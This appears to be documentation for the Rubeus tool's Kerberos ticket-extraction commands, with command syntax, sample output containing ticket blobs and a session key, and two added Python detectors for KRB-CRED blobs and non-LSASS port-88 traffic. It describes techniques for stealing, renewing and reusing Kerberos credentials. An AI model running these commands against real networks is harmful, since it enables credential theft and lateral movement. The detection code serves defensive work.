Breakdown of the ticket extraction/harvesting commands:
The triage, klist, and dump commands give increasing amounts of ticket detail.
triage
The triage action will output a table of the current user's Kerberos tickets, if not elevated. If run from an elevated context, a table describing all Kerberos tickets on the system is displayed. Tickets can be filtered for a specific service with /service:SNAME.
If elevated, tickets can be filtered for a specific LogonID with /luid:0xA.. or a specific user with /user:USER. This can be useful when triaging systems with a lot of Kerberos tickets.
klist
The klist action will list detailed information on the current user's logon session and Kerberos tickets, if not elevated. If run from an elevated context, information on all logon sessions and associated Kerberos tickets is displayed. Logon and ticket information can be displayed for a specific LogonID with /luid:0xA.. (if elevated).
Listing the current (non-elevated) user's logon session and Kerberos ticket information:
dump
The dump action will extract current TGTs and service tickets if in an elevated context. If not elevated, service tickets for the current user are extracted. The resulting extracted tickets can be filtered by /service (use /service:krbtgt for TGTs) and/or logon ID (the /luid:0xA.. parameter). The KRB-CRED files (.kirbis) are output as base64 blobs and can be reused with the ptt function, or Mimikatz's kerberos::ptt functionality.
Note: if run from a non-elevated context, the session keys for TGTs are not returned (by default) from the associated APIs, so only the extracted service tickets will be usable. If you want to (somewhat) work around this, use the tgtdeleg command.
Extracting the current user's usable service tickets:
tgtdeleg
The tgtdeleg action uses @gentilkiwi's Kekeo trick (tgt::deleg), which abuses the Kerberos GSS-API to retrieve a usable TGT for the current user without needing elevation on the host. AcquireCredentialsHandle() is used to get a handle to the current user's Kerberos security credentials, and InitializeSecurityContext() is called with the ISC_REQ_DELEGATE flag and a target SPN of HOST/DC.domain.com to prepare a fake delegate context to send to the DC. This results in an AP-REQ in the GSS-API output that contains a KRB_CRED in the authenticator checksum. The service ticket session key is extracted from the local Kerberos cache and is used to decrypt the KRB_CRED in the authenticator, resulting in a usable TGT .kirbi.
If automatic target/domain extraction is failing, a known SPN of a service configured with unconstrained delegation can be specified with /target:SPN.
    C:\Rubeus>Rubeus.exe tgtdeleg

       ______        _
      (_____ \      | |
       _____) )_   _| |__  _____ _   _  ___
      |  __  /| | | |  _ \| ___ | | | |/___)
      | |  \ \| |_| | |_) ) ____| |_| |___ |
      |_|   |_|____/|____/|_____)____/(___/

      v1.3.3

    [*] Action: Request Fake Delegation TGT (current user)
    [*] No target SPN specified, attempting to build 'HOST/dc.domain.com'
    [*] Initializing Kerberos GSS-API w/ fake delegation for target 'HOST/PRIMARY.testlab.local'
    [+] Kerberos GSS-API initialization success!
    [+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
    [*] Found the AP-REQ delegation ticket in the GSS-API output.
    [*] Authenticator etype: aes256_cts_hmac_sha1
    [*] Extracted the service ticket session key from the ticket cache: YnEFxPfqw3LdfNvLtdFfzaFf7zG3hG+HNjesy+6R+ys=
    [+] Successfully decrypted the authenticator
    [*] base64(ticket.kirbi):
          doIFNjCCBTKgAwIBBaEDAgEWoo...(snip)...
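For defenders, the base64 KRB-CRED blobs that dump and tgtdeleg print have a recognisable DER header, which makes them easy to hunt for in script-block logs, console captures or registry values. The following is an added example, not part of Rubeus: the function names are hypothetical, and the sample text reuses the truncated ticket prefix and the session key from the output above.

```python
import base64
import re

# Base64 runs long enough to hold the 18-byte DER header checked below.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# [0] INTEGER 5 (pvno) followed by [1] INTEGER 22 (msg-type = KRB-CRED), RFC 4120.
PVNO_AND_MSG_TYPE = bytes.fromhex("a003020105a103020116")

# Sample text: ticket prefix and session key copied from the tgtdeleg output above.
SAMPLE = """[*] base64(ticket.kirbi):
      doIFNjCCBTKgAwIBBaEDAgEWoo
[*] session key: YnEFxPfqw3LdfNvLtdFfzaFf7zG3hG+HNjesy+6R+ys=
"""

def _read_tlv(buf, pos):
    """Return (tag, offset of the value) for the DER element starting at pos."""
    tag, first = buf[pos], buf[pos + 1]
    if first < 0x80:                      # short-form length
        return tag, pos + 2
    n = first & 0x7F                      # long form: n length bytes follow
    if n == 0 or n > 4:
        raise ValueError("unsupported DER length")
    return tag, pos + 2 + n

def looks_like_krb_cred(b64_text):
    """True if the text starts with a KRB-CRED header (pvno 5, msg-type 22)."""
    head = b64_text[:64]
    head = head[:len(head) - len(head) % 4]   # decode whole 4-char groups only
    try:
        raw = base64.b64decode(head, validate=True)
        tag, pos = _read_tlv(raw, 0)
        if tag != 0x76:                   # 0x76 = [APPLICATION 22], the KRB-CRED tag
            return False
        tag, pos = _read_tlv(raw, pos)
        if tag != 0x30:                   # inner SEQUENCE
            return False
        return raw[pos:pos + 10] == PVNO_AND_MSG_TYPE
    except (ValueError, IndexError):      # not base64, or too short to parse
        return False

def find_krb_cred_blobs(text):
    """Return (line number, first 16 characters) of every KRB-CRED-shaped run."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for match in B64_RUN.finditer(line):
            if looks_like_krb_cred(match.group()):
                hits.append((lineno, match.group()[:16]))
    return hits
```

Because only the header is parsed, the check also matches the first line of wrapped output, and it ignores other base64 such as the session key.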
monitor
The monitor action will periodically extract all TGTs every /monitorinterval:X seconds (default of 60) and display any newly captured TGTs. A /targetuser:USER can be specified, returning only ticket data for said user. This function is especially useful on servers with unconstrained delegation enabled ;)
When the /targetuser:USER (or if not specified, any user) creates a new 4624 logon event, any extracted TGT KRB-CRED data is output.
The /nowrap flag causes the base64 encoded ticket output to not wrap per line.
If you want monitor to run for a specific period of time, use /runfor:SECONDS.
Further, if you wish to save the output to the registry, pass the /registry flag and specify a path under HKLM to create (e.g., /registry:SOFTWARE\MONITOR). Then you can remove this entry after you've finished running Rubeus by running Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force.
Note that this action needs to be run from an elevated context!
harvest
The harvest action takes monitor one step further. It periodically extracts all TGTs every /monitorinterval:X seconds (default of 60), extracts any new TGT KRB-CRED files, and keeps a cache of any extracted TGTs. Every interval, any TGTs that will expire before the next interval are automatically renewed (up until their renewal limit). Every /displayinterval:X seconds (default of 1200), the current cache of "usable"/valid TGT KRB-CRED .kirbis is output as base64 blobs.
This allows you to harvest usable TGTs from a system without opening up a read handle to LSASS, though elevated rights are needed to extract the tickets.
The /nowrap flag causes the base64 encoded ticket output to not wrap per line.
If you want harvest to run for a specific period of time, use /runfor:SECONDS.
Further, if you wish to save the output to the registry, pass the /registry flag and specify a path under HKLM to create (e.g., /registry:SOFTWARE\MONITOR). Then you can remove this entry after you've finished running Rubeus by running Get-Item HKLM:\SOFTWARE\MONITOR\ | Remove-Item -Recurse -Force.
    c:\Rubeus>Rubeus.exe harvest /interval:30

       ______        _
      (_____ \      | |
       _____) )_   _| |__  _____ _   _  ___
      |  __  /| | | |  _ \| ___ | | | |/___)
      | |  \ \| |_| | |_) ) ____| |_| |___ |
      |_|   |_|____/|____/|_____)____/(___/

      v0.0.1a

    [*] Action: TGT Harvesting (w/ auto-renewal)
    [*] Monitoring every 30 minutes for 4624 logon events

    ...(snip)...

    [*] Renewing TGT for dfm.a@TESTLAB.LOCAL
    [*] Connecting to 192.168.52.100:88
    [*] Sent 1520 bytes
    [*] Received 1549 bytes

    [*] 9/17/2018 6:43:02 AM - Current usable TGTs:

    User : dfm.a@TESTLAB.LOCAL
    StartTime : 9/17/2018 6:43:02 AM
    EndTime : 9/17/2018 11:43:02 AM
    RenewTill : 9/24/2018 2:07:48 AM
    Flags : name_canonicalize, renewable, forwarded, forwardable
    Base64EncodedTicket :
          doIFujCCBbagAw...(snip)...
Note that this action needs to be run from an elevated context!
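The renewal step in the output above has the tool itself connecting to the KDC on port 88, whereas Windows' built-in Kerberos client sends that traffic from lsass.exe. The following added example (not part of Rubeus) groups Sysmon Event ID 3 network-connection records by process image to surface that pattern; the host name, tool paths and function names are assumptions, and the events are constructed.

```python
from collections import defaultdict

# Windows' own Kerberos client runs inside LSASS, so this is the only expected source.
EXPECTED_IMAGES = {r"c:\windows\system32\lsass.exe"}

def _ev(time, image, port):
    """Build one constructed Sysmon Event ID 3 (network connection) record."""
    return {"Computer": "SRV01", "UtcTime": time, "Image": image,
            "DestinationIp": "192.168.52.100", "DestinationPort": port}

# Constructed events: host name and tool paths are made up; the KDC address is
# the one shown in the harvest output above.
EVENTS = [
    _ev("2018-09-17 06:12:40", r"C:\Windows\System32\lsass.exe", 88),
    _ev("2018-09-17 06:13:02", r"C:\Users\Public\tool.exe", 88),
    _ev("2018-09-17 06:13:05", r"C:\Users\Public\tool.exe", 443),
    _ev("2018-09-17 06:43:02", r"C:\Users\Public\tool.exe", 88),
    _ev("2018-09-17 06:50:00", r"C:\Users\Public\lsass.exe", 88),
]

def non_lsass_kerberos(events, expected=EXPECTED_IMAGES, kdc_port=88):
    """Group port-88 connections by (host, image) for images outside the allowlist."""
    findings = defaultdict(lambda: {"count": 0, "kdcs": set(), "first": None, "last": None})
    for ev in events:
        # Compare the full path, so a file named lsass.exe elsewhere still hits.
        image = ev["Image"].lower()
        if int(ev["DestinationPort"]) != kdc_port or image in expected:
            continue
        f = findings[(ev["Computer"], image)]
        f["count"] += 1
        f["kdcs"].add(ev["DestinationIp"])
        f["first"] = min(f["first"] or ev["UtcTime"], ev["UtcTime"])
        f["last"] = max(f["last"] or ev["UtcTime"], ev["UtcTime"])
    return dict(findings)
```

Legitimate software that carries its own Kerberos stack will also appear and belongs in the allowlist; repeated hits from one image at a regular interval are the pattern that matches harvest's renewals.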
| Command | Description |
| --- | --- |
| triage | LUID, username, service target, ticket expiration |
| klist | Detailed logon session and ticket info |
| dump | Detailed logon session and ticket data |
| tgtdeleg | Retrieve usable TGT for non-elevated user |
| monitor | Monitor logon events and dump new tickets |
| harvest | Same as monitor but with auto-renewal functionality |